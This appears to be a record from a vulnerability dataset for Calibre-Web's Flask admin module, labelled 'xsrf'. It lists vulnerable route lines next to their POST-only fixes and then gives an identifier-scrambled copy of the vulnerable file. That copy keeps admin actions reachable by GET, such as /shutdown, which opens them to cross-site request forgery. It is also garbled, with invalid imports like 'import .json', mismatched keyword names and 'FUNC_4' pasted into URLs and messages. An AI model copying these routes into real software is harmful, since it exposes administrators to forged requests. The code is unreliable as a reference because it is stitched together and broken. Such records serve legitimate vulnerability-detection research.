elif to_save.get("gmail"):
try:
config.mail_gmail_token = services.gmail.setup_gmail(config.mail_gmail_token)
flash(_(u"Gmail Account Verification Successful"), category="success")
except Exception as ex:
flash(str(ex), category="error")
log.error(ex)
return edit_mailsettings()
else:
_config_string(to_save, "mail_server")
_config_int(to_save, "mail_port")
_config_int(to_save, "mail_use_ssl")
_config_string(to_save, "mail_login")
_config_string(to_save, "mail_password")
_config_string(to_save, "mail_from")
_config_int(to_save, "mail_size", lambda y: int(y)*1024*1024)
try:
config.save()
except (OperationalError, InvalidRequestError):
ub.session.rollback()
log.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
return edit_mailsettings()
if to_save.get("test"):
if current_user.email:
result = send_test_mail(current_user.email, current_user.name)
if result is None:
flash(_(u"Test e-mail queued for sending to %(email)s, please check Tasks for result",
email=current_user.email), category="info")
else:
flash(_(u"There was an error sending the Test e-mail: %(res)s", res=result), category="error")
else:
flash(_(u"Please configure your e-mail address first..."), category="error")
else:
flash(_(u"E-mail server settings updated"), category="success")
return edit_mailsettings()
@admi.route("/admin/user/<int:user_id>", methods=["GET", "POST"])
@login_required
@admin_required
def edit_user(user_id):
content = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first() # type: ub.User
if not content or (not config.config_anonbrowse and content.name == "Guest"):
flash(_(u"User not found"), category="error")
return redirect(url_for('admin.admin'))
languages = calibre_db.speaking_language(return_all_languages=True)
translations = babel.list_translations() + [LC('en')]
kobo_support = feature_support['kobo'] and config.config_kobo_sync
if request.method == "POST":
to_save = request.form.to_dict()
resp = _handle_edit_user(to_save, content, languages, translations, kobo_support)
if resp:
return resp
return render_title_template("user_edit.html",
translations=translations,
languages=languages,
new_user=0,
content=content,
config=config,
registered_oauth=oauth_check,
mail_configured=config.get_mail_server_configured(),
kobo_support=kobo_support,
title=_(u"Edit User %(nick)s", nick=content.name),
page="edituser")
@admi.route("/admin/resetpassword/<int:user_id>", methods=["POST"])
@login_required
@admin_required
def reset_user_password(user_id):
if current_user is not None and current_user.is_authenticated:
ret, message = reset_password(user_id)
if ret == 1:
log.debug(u"Password for user %s reset", message)
flash(_(u"Password for user %(user)s reset", user=message), category="success")
elif ret == 0:
log.error(u"An unknown error occurred. Please try again later.")
flash(_(u"An unknown error occurred. Please try again later."), category="error")
else:
log.error(u"Please configure the SMTP mail settings first...")
flash(_(u"Please configure the SMTP mail settings first..."), category="error")
return redirect(url_for('admin.admin'))
@admi.route("/admin/logfile")
@login_required
@admin_required
def view_logfile():
logfiles = {0: logger.get_logfile(config.config_logfile),
1: logger.get_accesslogfile(config.config_access_logfile)}
return render_title_template("logviewer.html",
title=_(u"Logfile viewer"),
accesslog_enable=config.config_access_log,
log_enable=bool(config.config_logfile != logger.LOG_TO_STDOUT),
logfiles=logfiles,
page="logfile")
@admi.route("/ajax/log/<int:logtype>")
@login_required
@admin_required
def send_logfile(logtype):
if logtype == 1:
logfile = logger.get_accesslogfile(config.config_access_logfile)
return send_from_directory(os.path.dirname(logfile),
os.path.basename(logfile))
if logtype == 0:
logfile = logger.get_logfile(config.config_logfile)
return send_from_directory(os.path.dirname(logfile),
os.path.basename(logfile))
else:
return ""
@admi.route("/admin/logdownload/<int:logtype>")
@login_required
@admin_required
def download_log(logtype):
if logtype == 0:
file_name = logger.get_logfile(config.config_logfile)
elif logtype == 1:
file_name = logger.get_accesslogfile(config.config_access_logfile)
else:
abort(404)
if logger.is_valid_logfile(file_name):
return debug_info.assemble_logfiles(file_name)
abort(404)
@admi.route("/admin/debug")
@login_required
@admin_required
def download_debug():
return debug_info.send_debug()
@admi.route("/get_update_status", methods=['GET'])
@login_required
@admin_required
def get_update_status():
if feature_support['updater']:
log.info(u"Update status requested")
return updater_thread.get_available_updates(request.method, locale=get_locale())
else:
return ''
@admi.route("/get_updater_status", methods=['GET', 'POST'])
@login_required
@admin_required
def get_updater_status():
status = {}
if feature_support['updater']:
if request.method == "POST":
commit = request.form.to_dict()
if "start" in commit and commit['start'] == 'True':
text = {
"1": _(u'Requesting update package'),
"2": _(u'Downloading update package'),
"3": _(u'Unzipping update package'),
"4": _(u'Replacing files'),
"5": _(u'Database connections are closed'),
"6": _(u'Stopping server'),
"7": _(u'Update finished, please press okay and reload page'),
"8": _(u'Update failed:') + u' ' + _(u'HTTP Error'),
"9": _(u'Update failed:') + u' ' + _(u'Connection error'),
"10": _(u'Update failed:') + u' ' + _(u'Timeout while establishing connection'),
"11": _(u'Update failed:') + u' ' + _(u'General error'),
"12": _(u'Update failed:') + u' ' + _(u'Update file could not be saved in temp dir'),
"13": _(u'Update failed:') + u' ' + _(u'Files could not be replaced during update')
}
status['text'] = text
updater_thread.status = 0
updater_thread.resume()
status['status'] = updater_thread.get_update_status()
elif request.method == "GET":
try:
status['status'] = updater_thread.get_update_status()
if status['status'] == -1:
status['status'] = 7
except Exception:
status['status'] = 11
return json.dumps(status)
return ''
def ldap_import_create_user(user, user_data):
user_login_field = extract_dynamic_field_from_filter(user, config.config_ldap_user_object)
try:
username = user_data[user_login_field][0].decode('utf-8')
except KeyError as ex:
log.error("Failed to extract LDAP user: %s - %s", user, ex)
message = _(u'Failed to extract at least One LDAP User')
return 0, message
# check for duplicate username
if ub.session.query(ub.User).filter(func.lower(ub.User.name) == username.lower()).first():
# if ub.session.query(ub.User).filter(ub.User.name == username).first():
log.warning("LDAP User %s Already in Database", user_data)
return 0, None
kindlemail = ''
if 'mail' in user_data:
useremail = user_data['mail'][0].decode('utf-8')
if len(user_data['mail']) > 1:
kindlemail = user_data['mail'][1].decode('utf-8')
else:
log.debug('No Mail Field Found in LDAP Response')
useremail = username + '@email.com'
try:
# check for duplicate email
useremail = check_email(useremail)
except Exception as ex:
log.warning("LDAP Email Error: {}, {}".format(user_data, ex))
return 0, None
content = ub.User()
content.name = username
content.password = '' # dummy password which will be replaced by ldap one
content.email = useremail
content.kindle_mail = kindlemail
content.default_language = config.config_default_language
content.locale = config.config_default_locale
content.role = config.config_default_role
content.sidebar_view = config.config_default_show
content.allowed_tags = config.config_allowed_tags
content.denied_tags = config.config_denied_tags
content.allowed_column_value = config.config_allowed_column_value
content.denied_column_value = config.config_denied_column_value
ub.session.add(content)
try:
ub.session.commit()
return 1, None # increase no of users
except Exception as ex:
log.warning("Failed to create LDAP user: %s - %s", user, ex)
ub.session.rollback()
message = _(u'Failed to Create at Least One LDAP User')
return 0, message
@admi.route('/import_ldap_users', methods=["POST"])
@login_required
@admin_required
def import_ldap_users():
showtext = {}
try:
new_users = services.ldap.get_group_members(config.config_ldap_group_name)
except (services.ldap.LDAPException, TypeError, AttributeError, KeyError) as e:
log.debug_or_exception(e)
showtext['text'] = _(u'Error: %(ldaperror)s', ldaperror=e)
return json.dumps(showtext)
if not new_users:
log.debug('LDAP empty response')
showtext['text'] = _(u'Error: No user returned in response of LDAP server')
return json.dumps(showtext)
imported = 0
for username in new_users:
user = username.decode('utf-8')
if '=' in user:
# if member object field is empty take user object as filter
if config.config_ldap_member_user_object:
query_filter = config.config_ldap_member_user_object
else:
query_filter = config.config_ldap_user_object
try:
user_identifier = extract_user_identifier(user, query_filter)
except Exception as ex:
log.warning(ex)
continue
else:
user_identifier = user
query_filter = None
try:
user_data = services.ldap.get_object_details(user=user_identifier, query_filter=query_filter)
except AttributeError as ex:
log.debug_or_exception(ex)
continue
if user_data:
user_count, message = ldap_import_create_user(user, user_data)
if message:
showtext['text'] = message
else:
imported += user_count
else:
log.warning("LDAP User: %s Not Found", user)
showtext['text'] = _(u'At Least One LDAP User Not Found in Database')
if not showtext:
showtext['text'] = _(u'{} User Successfully Imported'.format(imported))
return json.dumps(showtext)
def extract_user_data_from_field(user, field):
match = re.search(field + r"=([\.\d\s\w-]+)", user, re.IGNORECASE | re.UNICODE)
if match:
return match.group(1)
else:
raise Exception("Could Not Parse LDAP User: {}".format(user))
def extract_dynamic_field_from_filter(user, filtr):
match = re.search("([a-zA-Z0-9-]+)=%s", filtr, re.IGNORECASE | re.UNICODE)
if match:
return match.group(1)
else:
raise Exception("Could Not Parse LDAP Userfield: {}", user)
def extract_user_identifier(user, filtr):
dynamic_field = extract_dynamic_field_from_filter(user, filtr)
return extract_user_data_from_field(user, dynamic_field)
| xsrf | {
"code": [
"@admi.route(\"/shutdown\")",
" task = int(request.args.get(\"parameter\").strip())",
"@admi.route(\"/ajax/fullsync\")",
"@admi.route(\"/admin/resetpassword/<int:user_id>\")",
"@admi.route('/import_ldap_users')"
],
"line_no": [
132,
136,
909,
1629,
1805
]
} | {
"code": [
"@admi.route(\"/shutdown\", methods=[\"POST\"])",
" task = request.get_json().get('parameter', -1)",
"@admi.route(\"/ajax/fullsync\", methods=[\"POST\"])",
"@admi.route(\"/admin/resetpassword/<int:user_id>\", methods=[\"POST\"])",
"@admi.route('/import_ldap_users', methods=[\"POST\"])"
],
"line_no": [
132,
136,
909,
1629,
1805
]
} |
import os
import re
import base64
import .json
import time
import operator
from datetime import datetime, timedelta
from babel import Locale as LC
from babel.dates import .format_datetime
from flask import Blueprint, flash, redirect, url_for, abort, request, make_response, send_from_directory, g, Response
from flask_login import .login_required, VAR_62, logout_user, confirm_login
from flask_babel import gettext as _
from flask import session as flask_session
from sqlalchemy import and_
from sqlalchemy.orm.attributes import .flag_modified
from sqlalchemy.exc import IntegrityError, OperationalError, InvalidRequestError
from sqlalchemy.sql.expression import .func, or_, VAR_130
from . import constants, logger, helper, services
from . import db, calibre_db, ub, web_server, get_locale, config, updater_thread, babel, gdriveutils, kobo_sync_status
from .helper import .check_valid_domain, send_test_mail, reset_password, generate_password_hash, check_email, \
valid_email, check_username
from .gdriveutils import is_gdrive_ready, gdrive_support
from .render_template import render_title_template, get_sidebar_config
from . import debug_info, _BABEL_TRANSLATIONS
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
VAR_0 = logger.create()
VAR_1 = {
'ldap': bool(services.ldap),
'goodreads': bool(services.goodreads_support),
'kobo': bool(services.kobo),
'updater': constants.UPDATER_AVAILABLE,
'gmail': bool(services.gmail)
}
try:
import rarfile # pylint: disable=unused-import
VAR_1['rar'] = True
except (ImportError, SyntaxError):
VAR_1['rar'] = False
try:
from .oauth_bb import .oauth_check, VAR_96
VAR_1['oauth'] = True
except ImportError as err:
VAR_0.debug('Cannot import Flask-Dance, login with Oauth will not work: %s', err)
VAR_1['oauth'] = False
VAR_96 = []
VAR_97 = {}
VAR_1['gdrive'] = gdrive_support
VAR_2 = Blueprint('admin', __name__)
def FUNC_0(VAR_3):
@wraps(VAR_3)
def FUNC_71(*VAR_30, **VAR_31):
if VAR_62.role_admin():
return VAR_3(*VAR_30, **VAR_31)
abort(403)
return FUNC_71
@VAR_2.before_app_request
def FUNC_1():
if VAR_62.is_authenticated:
confirm_login()
if not ub.check_user_session(VAR_62.id, flask_session.get('_id')) and 'opds' not in request.path:
logout_user()
g.constants = constants
g.user = VAR_62
g.allow_registration = config.config_public_reg
g.allow_anonymous = config.config_anonbrowse
g.allow_upload = config.config_uploading
g.current_theme = config.config_theme
g.config_authors_max = config.config_authors_max
g.shelves_access = ub.session.query(ub.Shelf).filter(
or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == VAR_62.id)).order_by(ub.Shelf.name).all()
if '/static/' not in request.path and not config.db_configured and \
request.endpoint not in ('admin.ajax_db_config',
'admin.simulatedbchange',
'admin.db_configuration',
'web.login',
'web.logout',
'admin.load_dialogtexts',
'admin.ajax_pathchooser'):
return redirect(url_for('admin.db_configuration'))
@VAR_2.route("/admin")
@login_required
def FUNC_2():
abort(403)
@VAR_2.route("/shutdown")
@login_required
@FUNC_0
def FUNC_3():
VAR_32 = VAR_119(request.args.get("parameter").strip())
VAR_33 = {}
if VAR_32 in (0, 1): # valid commandos received
calibre_db.dispose()
ub.dispose()
if VAR_32 == 0:
VAR_33['text'] = _(u'Server restarted, please reload page')
else:
VAR_33['text'] = _(u'Performing FUNC_3 of server, please close window')
web_server.stop(VAR_32 == 0)
return json.dumps(VAR_33)
if VAR_32 == 2:
VAR_0.warning("reconnecting to calibre database")
calibre_db.reconnect_db(config, ub.app_DB_path)
VAR_33['text'] = _(u'Reconnect successful')
return json.dumps(VAR_33)
showtext['text'] = _(u'Unknown command')
return json.dumps(VAR_33), 400
@VAR_2.route("/FUNC_4/view")
@login_required
@FUNC_0
def FUNC_4():
VAR_34 = updater_thread.get_current_version_info()
if VAR_34 is False:
VAR_98 = _(u'Unknown')
else:
if 'datetime' in VAR_34:
VAR_98 = VAR_34['datetime']
VAR_117 = timedelta(seconds=time.timezone if (time.localtime().tm_isdst == 0) else time.altzone)
VAR_118 = datetime.strptime(VAR_98[:19], "%Y-%m-%dT%H:%M:%S")
if len(VAR_98) > 19: # VAR_66 if string has timezone
if VAR_98[19] == '+':
VAR_118 -= timedelta(hours=VAR_119(VAR_98[20:22]), minutes=VAR_119(VAR_98[23:]))
elif VAR_98[19] == '-':
VAR_118 += timedelta(hours=VAR_119(VAR_98[20:22]), minutes=VAR_119(VAR_98[23:]))
VAR_98 = format_datetime(VAR_118 - VAR_117, format='short', VAR_58=get_locale())
else:
VAR_98 = VAR_34['version']
VAR_35 = ub.session.query(ub.User).all()
VAR_36 = config.get_mail_settings()
VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
return render_title_template("admin.html", VAR_35=allUser, email=VAR_36, config=config, VAR_98=commit,
VAR_1=feature_support, VAR_25=kobo_support,
title=_(u"Admin page"), page="admin")
@VAR_2.route("/FUNC_4/dbconfig", methods=["GET", "POST"])
@login_required
@FUNC_0
def FUNC_5():
if request.method == "POST":
return FUNC_48()
return FUNC_51()
@VAR_2.route("/FUNC_4/config", methods=["GET"])
@login_required
@FUNC_0
def FUNC_6():
return render_title_template("config_edit.html",
config=config,
provider=VAR_96,
VAR_1=feature_support,
title=_(u"Basic Configuration"), page="config")
@VAR_2.route("/FUNC_4/ajaxconfig", methods=["POST"])
@login_required
@FUNC_0
def FUNC_7():
return FUNC_49()
@VAR_2.route("/FUNC_4/ajaxdbconfig", methods=["POST"])
@login_required
@FUNC_0
def FUNC_8():
return FUNC_48()
@VAR_2.route("/FUNC_4/alive", methods=["GET"])
@login_required
@FUNC_0
def FUNC_9():
return "", 200
@VAR_2.route("/FUNC_4/viewconfig")
@login_required
@FUNC_0
def FUNC_10():
VAR_37 = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all()
VAR_38 = calibre_db.session.query(db.Custom_Columns)\
.filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all()
VAR_23 = calibre_db.speaking_language()
VAR_24 = [LC('en')] + babel.list_translations()
return render_title_template("config_view_edit.html", conf=config, readColumns=VAR_37,
restrictColumns=VAR_38,
VAR_23=languages,
VAR_24=translations,
title=_(u"UI Configuration"), page="uiconfig")
@VAR_2.route("/FUNC_4/usertable")
@login_required
@FUNC_0
def FUNC_11():
VAR_39 = VAR_62.view_settings.get('useredit', {})
VAR_23 = calibre_db.speaking_language()
VAR_24 = babel.list_translations() + [LC('en')]
VAR_35 = ub.session.query(ub.User)
VAR_40 = calibre_db.session.query(db.Tags)\
.join(db.books_tags_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(VAR_130('books_tags_link.tag'))\
.order_by(db.Tags.name).all()
if config.config_restricted_column:
VAR_99 = calibre_db.session.query(db.cc_classes[config.config_restricted_column]).all()
else:
VAR_99 = []
if not config.config_anonbrowse:
VAR_35 = allUser.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
VAR_25 = VAR_1['kobo'] and config.config_kobo_sync
return render_title_template("user_table.html",
VAR_54=VAR_35.all(),
VAR_40=tags,
VAR_99=custom_values,
VAR_24=translations,
VAR_23=languages,
visiblility=VAR_39,
all_roles=constants.ALL_ROLES,
VAR_25=kobo_support,
sidebar_settings=constants.sidebar_settings,
title=_(u"Edit Users"),
page="usertable")
@VAR_2.route("/ajax/listusers")
@login_required
@FUNC_0
def FUNC_12():
VAR_41 = VAR_119(request.args.get("offset") or 0)
VAR_42 = VAR_119(request.args.get("limit") or 10)
VAR_43 = request.args.get("search")
VAR_44 = request.args.get("sort", "id")
VAR_45 = request.args.get("order", "").lower()
VAR_46 = None
if VAR_44 == "state":
VAR_46 = json.loads(request.args.get("state", "[]"))
if VAR_44 != "state" and VAR_45:
VAR_45 = VAR_130(VAR_44 + " " + VAR_45)
elif not VAR_46:
VAR_45 = ub.User.id.asc()
VAR_47 = ub.session.query(ub.User)
if not config.config_anonbrowse:
VAR_47 = VAR_47.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
VAR_48 = VAR_49 = VAR_47.count()
if VAR_43:
VAR_47 = VAR_47.filter(or_(VAR_18.lower(ub.User.name).ilike("%" + VAR_43 + "%"),
VAR_18.lower(ub.User.kindle_mail).ilike("%" + VAR_43 + "%"),
VAR_18.lower(ub.User.email).ilike("%" + VAR_43 + "%")))
if VAR_46:
VAR_54 = calibre_db.get_checkbox_sorted(VAR_47.all(), VAR_46, VAR_41, VAR_42, request.args.get("order", "").lower())
else:
VAR_54 = VAR_47.order_by(VAR_45).offset(VAR_41).limit(VAR_42).all()
if VAR_43:
VAR_49 = len(VAR_54)
for VAR_12 in VAR_54:
if VAR_12.default_language == "all":
VAR_12.default = _("All")
else:
VAR_12.default = LC.parse(VAR_12.default_language).get_language_name(get_locale())
VAR_50 = {'totalNotFiltered': VAR_48, 'total': VAR_49, "rows": VAR_54}
VAR_51 = json.dumps(VAR_50, cls=db.AlchemyEncoder)
VAR_52 = make_response(VAR_51)
VAR_52.headers["Content-Type"] = "application/json; charset=utf-8"
return VAR_52
@VAR_2.route("/ajax/deleteuser", methods=['POST'])
@login_required
@FUNC_0
def FUNC_13():
VAR_53 = request.form.to_dict(flat=False)
VAR_54 = None
if "userid[]" in VAR_53:
VAR_54 = ub.session.query(ub.User).filter(ub.User.id.in_(VAR_53['userid[]'])).all()
elif "userid" in VAR_53:
VAR_54 = ub.session.query(ub.User).filter(ub.User.id == VAR_53['userid'][0]).all()
VAR_55 = 0
VAR_56 = list()
VAR_57 = list()
if not VAR_54:
VAR_0.error("User not found")
return Response(json.dumps({'type': "danger", 'message': _("User not found")}), mimetype='application/json')
for VAR_12 in VAR_54:
try:
VAR_71 = FUNC_53(VAR_12)
VAR_55 += 1
except Exception as ex:
VAR_0.error(ex)
VAR_56.append({'type': "danger", 'message': str(ex)})
if VAR_55 == 1:
VAR_0.info("User {} deleted".format(VAR_53))
VAR_57 = [{'type': "success", 'message': VAR_71}]
elif VAR_55 > 1:
VAR_0.info("Users {} deleted".format(VAR_53))
VAR_57 = [{'type': "success", 'message': _("{} VAR_54 deleted successfully").format(VAR_55)}]
VAR_57.extend(VAR_56)
return Response(json.dumps(VAR_57), mimetype='application/json')
@VAR_2.route("/ajax/getlocale")
@login_required
@FUNC_0
def FUNC_14():
VAR_58 = babel.list_translations() + [LC('en')]
VAR_59 = list()
VAR_60 = get_locale()
for loc in VAR_58:
VAR_59.append({'value': str(loc), 'text': loc.get_language_name(VAR_60)})
return json.dumps(VAR_59)
@VAR_2.route("/ajax/getdefaultlanguage")
@login_required
@FUNC_0
def FUNC_15():
VAR_23 = calibre_db.speaking_language()
VAR_59 = list()
VAR_59.append({'value': 'all', 'text': _('Show All')})
for lang in VAR_23:
VAR_59.append({'value': lang.lang_code, 'text': lang.name})
return json.dumps(VAR_59)
@VAR_2.route("/ajax/editlistusers/<VAR_4>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_16(VAR_4):
VAR_61 = request.form.to_dict(flat=False)
VAR_47 = ub.session.query(ub.User)
if not config.config_anonbrowse:
VAR_47 = VAR_47.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS)
if "pk" in VAR_61:
VAR_54 = [VAR_47.filter(ub.User.id == VAR_61['pk'][0]).one_or_none()]
else:
if "pk[]" in VAR_61:
VAR_54 = VAR_47.filter(ub.User.id.in_(VAR_61['pk[]'])).all()
else:
return _("Malformed request"), 400
if 'field_index' in VAR_61:
VAR_61['field_index'] = VAR_61['field_index'][0]
if 'value' in VAR_61:
VAR_61['value'] = VAR_61['value'][0]
elif not ('value[]' in VAR_61):
return _("Malformed request"), 400
for VAR_12 in VAR_54:
try:
if VAR_4 in ['denied_tags', 'allowed_tags', 'allowed_column_value', 'denied_column_value']:
if 'value[]' in VAR_61:
setattr(VAR_12, VAR_4, FUNC_29(VAR_12, VAR_61['action'][0], VAR_4, VAR_61['value[]']))
else:
setattr(VAR_12, VAR_4, VAR_61['value'].strip())
else:
VAR_61['value'] = VAR_61['value'].strip()
if VAR_4 == 'name':
if VAR_12.name == "Guest":
raise Exception(_("Guest Name can't be changed"))
VAR_12.name = check_username(VAR_61['value'])
elif VAR_4 =='email':
VAR_12.email = check_email(VAR_61['value'])
elif VAR_4 =='kobo_only_shelves_sync':
VAR_12.kobo_only_shelves_sync = VAR_119(VAR_61['value'] == 'true')
elif VAR_4 == 'kindle_mail':
VAR_12.kindle_mail = valid_email(VAR_61['value']) if VAR_61['value'] else ""
elif VAR_4.endswith('role'):
VAR_125 = VAR_119(VAR_61['field_index'])
if VAR_12.name == "Guest" and VAR_125 in \
[constants.ROLE_ADMIN, constants.ROLE_PASSWD, constants.ROLE_EDIT_SHELFS]:
raise Exception(_("Guest can't have this role"))
if VAR_125 > 0 and VAR_125 <= constants.ROLE_VIEWER and (VAR_125 & value-1 == 0 or VAR_125 == 1):
if VAR_61['value'] == 'true':
VAR_12.role |= VAR_125
elif VAR_61['value'] == 'false':
if VAR_125 == constants.ROLE_ADMIN:
if not ub.session.query(ub.User).\
filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != VAR_12.id).count():
return Response(
json.dumps([{'type': "danger",
'message':_(u"No FUNC_4 VAR_12 remaining, can't remove FUNC_4 role",
nick=VAR_12.name)}]), mimetype='application/json')
VAR_12.role &= ~VAR_125
else:
raise Exception(_("Value has to be true or false"))
else:
raise Exception(_("Invalid role"))
elif VAR_4.startswith('sidebar'):
VAR_125 = VAR_119(VAR_61['field_index'])
if VAR_12.name == "Guest" and VAR_125 == constants.SIDEBAR_READ_AND_UNREAD:
raise Exception(_("Guest can't have this view"))
if VAR_125 > 0 and VAR_125 <= constants.SIDEBAR_LIST and (VAR_125 & value-1 == 0 or VAR_125 == 1):
if VAR_61['value'] == 'true':
VAR_12.sidebar_view |= VAR_125
elif VAR_61['value'] == 'false':
VAR_12.sidebar_view &= ~VAR_125
else:
raise Exception(_("Value has to be true or false"))
else:
raise Exception(_("Invalid view"))
elif VAR_4 == 'locale':
if VAR_12.name == "Guest":
raise Exception(_("Guest's Locale is determined automatically and can't be set"))
if VAR_61['value'] in _BABEL_TRANSLATIONS:
VAR_12.locale = VAR_61['value']
else:
raise Exception(_("No Valid Locale Given"))
elif VAR_4 == 'default_language':
VAR_23 = calibre_db.session.query(db.Languages) \
.join(db.books_languages_link) \
.join(db.Books) \
.filter(calibre_db.common_filters()) \
.group_by(VAR_130('books_languages_link.lang_code')).all()
VAR_131 = [lang.lang_code for lang in VAR_23] + ["all"]
if VAR_61['value'] in VAR_131:
VAR_12.default_language = VAR_61['value']
else:
raise Exception(_("No Valid Book Language Given"))
else:
return _("Parameter not found"), 400
except Exception as ex:
VAR_0.debug_or_exception(ex)
return str(ex), 400
ub.session_commit()
return ""
@VAR_2.route("/ajax/user_table_settings", methods=['POST'])
@login_required
@FUNC_0
def FUNC_17():
VAR_62.view_settings['useredit'] = json.loads(request.data)
try:
try:
flag_modified(VAR_62, "view_settings")
except AttributeError:
pass
ub.session.commit()
except (InvalidRequestError, OperationalError):
VAR_0.error("Invalid request received: {}".format(request))
return "Invalid request", 400
return ""
def FUNC_18(VAR_5):
if VAR_5 != "0":
if not calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.id == VAR_5) \
.filter(and_(db.Custom_Columns.datatype == 'bool', db.Custom_Columns.mark_for_delete == 0)).all():
return False
return True
def FUNC_19(VAR_5):
if VAR_5 != "0":
if not calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.id == VAR_5) \
.filter(and_(db.Custom_Columns.datatype == 'text', db.Custom_Columns.mark_for_delete == 0)).all():
return False
return True
@VAR_2.route("/FUNC_4/viewconfig", methods=["POST"])
@login_required
@FUNC_0
def FUNC_20():
VAR_16 = request.form.to_dict()
FUNC_41(VAR_16, "config_calibre_web_title")
FUNC_41(VAR_16, "config_columns_to_ignore")
if FUNC_41(VAR_16, "config_title_regex"):
calibre_db.update_title_sort(config)
if not FUNC_18(VAR_16.get("config_read_column", "0")):
flash(_(u"Invalid Read Column"), category="error")
VAR_0.debug("Invalid Read column")
return FUNC_10()
FUNC_38(VAR_16, "config_read_column")
if not FUNC_19(VAR_16.get("config_restricted_column", "0")):
flash(_(u"Invalid Restricted Column"), category="error")
VAR_0.debug("Invalid Restricted Column")
return FUNC_10()
FUNC_38(VAR_16, "config_restricted_column")
FUNC_38(VAR_16, "config_theme")
FUNC_38(VAR_16, "config_random_books")
FUNC_38(VAR_16, "config_books_per_page")
FUNC_38(VAR_16, "config_authors_max")
FUNC_41(VAR_16, "config_default_language")
FUNC_41(VAR_16, "config_default_locale")
config.config_default_role = constants.selected_roles(VAR_16)
config.config_default_role &= ~constants.ROLE_ANONYMOUS
config.config_default_show = sum(VAR_119(k[5:]) for k in VAR_16 if k.startswith('show_'))
if "Show_detail_random" in VAR_16:
config.config_default_show |= constants.DETAIL_RANDOM
config.save()
flash(_(u"Calibre-Web FUNC_6 updated"), category="success")
VAR_0.debug("Calibre-Web FUNC_6 updated")
FUNC_1()
return FUNC_10()
@VAR_2.route("/ajax/loaddialogtexts/<VAR_6>", methods=['POST'])
@login_required
def FUNC_21(VAR_6):
VAR_63 = {"header": "", "main": "", "valid": 1}
if VAR_6 == "config_delete_kobo_token":
VAR_63["main"] = _('Do you really want to delete the Kobo Token?')
elif VAR_6 == "btndeletedomain":
VAR_63["main"] = _('Do you really want to delete this domain?')
elif VAR_6 == "btndeluser":
VAR_63["main"] = _('Do you really want to delete this VAR_12?')
elif VAR_6 == "delete_shelf":
VAR_63["main"] = _('Are you sure you want to delete this shelf?')
elif VAR_6 == "select_locale":
VAR_63["main"] = _('Are you sure you want to change locales of selected VAR_12(s)?')
elif VAR_6 == "select_default_language":
VAR_63["main"] = _('Are you sure you want to change visible book VAR_23 for selected VAR_12(s)?')
elif VAR_6 == "role":
VAR_63["main"] = _('Are you sure you want to change the selected role for the selected VAR_12(s)?')
elif VAR_6 == "restrictions":
VAR_63["main"] = _('Are you sure you want to change the selected restrictions for the selected VAR_12(s)?')
elif VAR_6 == "sidebar_view":
VAR_63["main"] = _('Are you sure you want to change the selected VAR_39 restrictions for the selected VAR_12(s)?')
elif VAR_6 == "kobo_only_shelves_sync":
VAR_63["main"] = _('Are you sure you want to change shelf sync behavior for the selected VAR_12(s)?')
elif VAR_6 == "db_submit":
VAR_63["main"] = _('Are you sure you want to change Calibre library location?')
elif VAR_6 == "btnfullsync":
VAR_63["main"] = _("Are you sure you want delete Calibre-Web's sync database to force a full sync with your Kobo Reader?")
return json.dumps(VAR_63)
@VAR_2.route("/ajax/editdomain/<VAR_119:VAR_7>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_22(VAR_7):
VAR_61 = request.form.to_dict()
VAR_64 = ub.session.query(ub.Registration).filter(ub.Registration.id == VAR_61['pk']).first()
VAR_64.domain = VAR_61['value'].replace('*', '%').replace('?', '_').lower()
return ub.session_commit("Registering Domains edited {}".format(VAR_64.domain))
@VAR_2.route("/ajax/adddomain/<VAR_119:VAR_7>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_23(VAR_7):
VAR_65 = request.form.to_dict()['domainname'].replace('*', '%').replace('?', '_').lower()
VAR_66 = ub.session.query(ub.Registration).filter(ub.Registration.domain == VAR_65)\
.filter(ub.Registration.allow == VAR_7).first()
if not VAR_66:
VAR_100 = ub.Registration(domain=VAR_65, VAR_7=allow)
ub.session.add(VAR_100)
ub.session_commit("Registering Domains added {}".format(VAR_65))
return ""
@VAR_2.route("/ajax/deletedomain", methods=['POST'])
@login_required
@FUNC_0
def FUNC_24():
try:
VAR_101 = request.form.to_dict()['domainid'].replace('*', '%').replace('?', '_').lower()
ub.session.query(ub.Registration).filter(ub.Registration.id == VAR_101).delete()
ub.session_commit("Registering Domains deleted {}".format(VAR_101))
if not ub.session.query(ub.Registration).filter(ub.Registration.allow == 1).count():
VAR_100 = ub.Registration(domain="%.%", VAR_7=1)
ub.session.add(VAR_100)
ub.session_commit("Last Registering Domain deleted, added *.* as default")
except KeyError:
pass
return ""
@VAR_2.route("/ajax/domainlist/<VAR_119:VAR_7>")
@login_required
@FUNC_0
def FUNC_25(VAR_7):
VAR_64 = ub.session.query(ub.Registration).filter(ub.Registration.allow == VAR_7).all()
VAR_67 = json.dumps([{"domain": r.domain.replace('%', '*').replace('_', '?'), "id": r.id} for r in VAR_64])
VAR_68 = json.dumps(VAR_67.replace('"', "'")).lstrip('"').strip('"')
VAR_52 = make_response(VAR_68.replace("'", '"'))
VAR_52.headers["Content-Type"] = "application/json; charset=utf-8"
return VAR_52
@VAR_2.route("/ajax/editrestriction/<VAR_119:VAR_8>", defaults={"user_id": 0}, methods=['POST'])
@VAR_2.route("/ajax/editrestriction/<VAR_119:VAR_8>/<VAR_119:VAR_9>", methods=['POST'])
@login_required
@FUNC_0
def FUNC_26(VAR_8, VAR_9):
VAR_10 = request.form.to_dict()
if VAR_10['id'].startswith('a'):
